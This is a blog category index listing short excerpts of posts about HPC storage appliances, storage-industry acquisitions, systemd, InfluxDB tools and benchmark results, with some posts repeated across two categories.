Category: appliances
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
You can't win
Like that old joke about the patient going to the Doctor for a pain …
Imagine if you will, a patient whom, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And be more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “lets just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours
We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
Nutanix files for IPO
Short story here. I am not going to pour over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
sios-metrics core rewritten
This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. Its been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h Filesystem Size Used Avail Use% Mounted on tmpfs 8.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
InfluxDB cli ready for people to play with
The code is on github. Installation should be simple sudo make INSTALLPATH=/path/where/you/want/it It will install any needed Perl modules for you. I’ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldly … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, its borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based) , and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. Whats coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Category: big-data
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
Interesting post on mixed integer programming for diets ... that has some hilarious output
I am a fan of the Julia language. Tremendously powerful analytical environment, compiled, high performance, easy to understand and use, strongly typed, … there’s a long list of reasons why I like it. If you are doing analytics, modeling, computation in other languages, it is definitely worth a look. Think of it as python, compiled, with multiple dispatch and strong typing … and no indent-as-structure problem. My Julia fanboi-ism aside, there was an interesting blog post about using JuMP, a linear programming environment for Julia.
Posts
Aria2c for the win!
I’ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Finally got to use MCE::* in a project
There are a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
#Perl on the rise for #DevOps
Note: I do quite a bit of development in Perl, and have my own biases, so please do take this into consideration. It is one of many languages I use, but it is by and large, my current go-to language. I’ll discuss below. According to TIOBE (yeah, I know), Perl usage is on the rise. The linked article posits that this is for DevOps reasons. The author of the article works at a company that makes money from Perl and Python … they build (actually very good) tools.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
@scalableinfo 60 bay Unison with these: 3.6PB raw per 4U box
Color me impressed … Seagate and their 60TB 3.5inch SAS drive. Yes, the 60 bay Unison units can handle this. That would be 3.6PB per 4U unit. 10x 4U per 48U rack. 36PB raw per rack. 100PB in 3 racks, 30 racks for an exabyte (EB). The issue would be the storage bandwidth wall height. Doing the math, 60TB/(1GB/s) -> 6 x 104 seconds to empty/fill such a single unit. We can drive these about 50GB/s in a box, so a single box would be 3600TB/(50GB/s) or 7.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
Talk from #Kxcon2016 on #HPC #Storage for #BigData analytics is up
See here, which was largely about how to architect high performance analytics platforms, and a specific shout out to our Forte NVMe flash unit, which is currently available in volume starting at $1 USD/GB. Some of the more interesting results from our testing:
* 24GB/s bandwidth largely insensitive to block size. * 5+ Million IOPs random IO (5+MIOPs) sensitive to block size. * 4k random read (100%) were well north of 5M IOPs.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
Nutanix files for IPO
Short story here. I am not going to pour over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
#Perl6 compiler betas are ready
Ok … I am … well … blown away. I had thought Perl6 would be the Duke Nukem forever of programming languages. Indeed, it has been in active development for more than a decade. But you can download compilers (yes, you heard me right, compilers) for it now. You might say “why perl” or “why perl6” or “why now, because we have #insert(language_x) and its wonderful”. Good question, I wasn’t sure why it was relevant, until I started reading some of the code.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
